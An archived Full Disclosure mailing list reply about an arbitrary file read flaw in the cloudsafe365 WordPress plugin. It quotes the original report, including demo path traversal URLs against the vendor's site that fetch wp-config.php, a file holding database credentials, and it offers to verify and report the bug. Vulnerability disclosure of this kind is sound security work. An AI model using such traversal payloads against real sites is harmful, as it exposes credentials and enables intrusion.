Full Disclosure mailing list archives

Re: cloudsafe365 for wordpress: file disclosure

From: Henri Salo <henri () nerv fi>
Date: Tue, 28 Aug 2012 11:50:15 +0300

On Tue, Aug 28, 2012 at 10:29:46AM +0200, Jan van Niekerk wrote:

This wordpress security plugin lets you read arbitrary files on the
system.  Looking at the code, there will be plenty of stuff like this.

Demo:
  
http://www.cloudsafe365.com/wp-content/plugins/cloudsafe365-for-wp/admin/editor/cs365_edit.php?file=../../../../../wp-config.php
  
http://www.cloudsafe365.com/wp-content/plugins/cloudsafe365-for-wp/admin/editor/cs365_edit.php?file=../../../../../wp-login.php

Disclosure timeline:
 * Today: visit wordpress.org
 * Try to report bug
 * System wants login
 * Visit web site: vendor has no e-mail address and stupid one-liner
contact form and hidden name
 * Stuff it, I'm not going to phone them


I can verify and report this. Could you list all the vulnerabilities you can find from the plugin? You can also contact 
plugins () wordpress org address in case you found vulnerabilities from WordPress plugins in the future.

- Henri Salo

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Current thread:

cloudsafe365 for wordpress: file disclosure Jan van Niekerk (Aug 28)
- Re: cloudsafe365 for wordpress: file disclosure Henri Salo (Aug 28)
  - Re: cloudsafe365 for wordpress: file disclosure Christian Sciberras (Aug 28)
    - Re: cloudsafe365 for wordpress: file disclosure Henri Salo (Aug 28)
    - Re: cloudsafe365 for wordpress: file disclosure Ivan Carlos (Aug 28)
- Re: cloudsafe365 for wordpress: file disclosure craig deveson (Aug 28)